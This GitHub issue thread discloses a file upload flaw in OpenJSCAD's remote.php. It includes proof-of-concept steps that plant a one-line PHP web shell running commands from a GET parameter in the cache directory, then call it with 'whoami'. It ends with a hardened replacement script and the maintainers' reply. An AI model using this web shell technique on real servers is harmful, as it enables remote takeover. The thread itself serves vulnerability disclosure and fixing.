
Remote.php has a security issue with arbitrary file uploads

Open Beatriz-ai-boop opened this issue 1 year ago • 4 comments

'packages/web/remote.php' lacks proper validation and sanitization of the $_REQUEST['url'] parameter. Malicious users could inject malicious URLs, leading to remote code execution or other attacks. Using the basename function may also cause path traversal issues.

Beatriz-ai-boop avatar Jul 09 '24 02:07 Beatriz-ai-boop

@Beatriz-ai-boop you need to be more specific and show an example. Taking into account the recent uptick in spam CVE reports, and "AI crap" bots doing CVE searches, you need to provide proof the CVE is real and not just assumed.

hrgdavor avatar Jul 09 '24 07:07 hrgdavor

Wow! Is @Beatriz-ai-boop trying to be helpful?

The good news is that the PHP remote is not being used.

z3dev avatar Jul 09 '24 10:07 z3dev

Here are more details.

  1. First download the project.
  2. Run mkdir cache in OpenJSCAD.org-master/packages/web/
  3. Request http://127.0.0.1:8099/OpenJSCAD.org-master/packages/web/remote.php?url=http://127.0.0.1:8099/shell.php

     shell.php is:

     <?php echo "<?php \$o=exec(\$_GET['c']);echo \$o;?>"?>

  4. Request http://127.0.0.1:8099/OpenJSCAD.org-master/packages/web/cache/240712060740-shell.php?c=whoami

Then you can execute any command based on this php file.

@hrgdavor @z3dev

Beatriz-ai-boop avatar Jul 12 '24 06:07 Beatriz-ai-boop
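A hardened version of the fetch-and-cache logic the report describes, added here as an example for this thread; it is not the project's remote.php and assumes only that the script's job is to download $_REQUEST['url'] into cache/ under a generated name. ALLOWED_HOSTS and ALLOWED_EXT are placeholder allow-lists to adjust for a real deployment.

```php
<?php
// Added example, not OpenJSCAD.org's own remote.php. Assumed behaviour of the
// original: fetch $_REQUEST['url'] and store the body in cache/ for the viewer.
declare(strict_types=1);

const CACHE_DIR = __DIR__ . '/cache';
// Assumption: only these hosts may be fetched (closes the SSRF angle as well).
const ALLOWED_HOSTS = ['raw.githubusercontent.com'];
// Only data formats the viewer consumes; nothing the web server would execute.
const ALLOWED_EXT = ['jscad', 'stl', 'amf', 'obj', 'json'];
const MAX_BYTES = 10 * 1024 * 1024;

// Accept only absolute http(s) URLs whose host is on the allow-list.
function validateRemoteUrl(string $url): ?string {
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) return null;
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) return null;
    if (!in_array(strtolower($parts['host']), ALLOWED_HOSTS, true)) return null;
    return $url;
}

// Derive a cache filename that cannot traverse directories or be executed.
function safeCacheName(string $url): ?string {
    $base = basename(parse_url($url, PHP_URL_PATH) ?? '');
    // Conservative character set: no slashes, no NUL, no leading dots.
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$/', $base)) return null;
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) return null;
    // Random prefix instead of a predictable timestamp.
    return bin2hex(random_bytes(8)) . '-' . $base;
}

$url  = validateRemoteUrl((string)($_REQUEST['url'] ?? ''));
$name = $url !== null ? safeCacheName($url) : null;
if ($url === null || $name === null) {
    http_response_code(400);
    exit('rejected');
}

// No redirects (a redirect could leave the allow-list) and a hard size cap.
$ctx  = stream_context_create(['http' => ['follow_location' => 0, 'timeout' => 10]]);
$body = file_get_contents($url, false, $ctx, 0, MAX_BYTES + 1);
if ($body === false || strlen($body) > MAX_BYTES) {
    http_response_code(502);
    exit('fetch failed');
}
// cache/ must additionally be served with script execution disabled.
file_put_contents(CACHE_DIR . '/' . $name, $body, LOCK_EX);
header('Content-Type: text/plain');
echo $name;
```

With these checks the request shown in the report is rejected at validateRemoteUrl (host not allowed) and again at safeCacheName (.php is not an allowed extension), so nothing executable reaches cache/.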

@Beatriz-ai-boop Go for it! Please make the fixes!

z3dev avatar Jul 12 '24 08:07 z3dev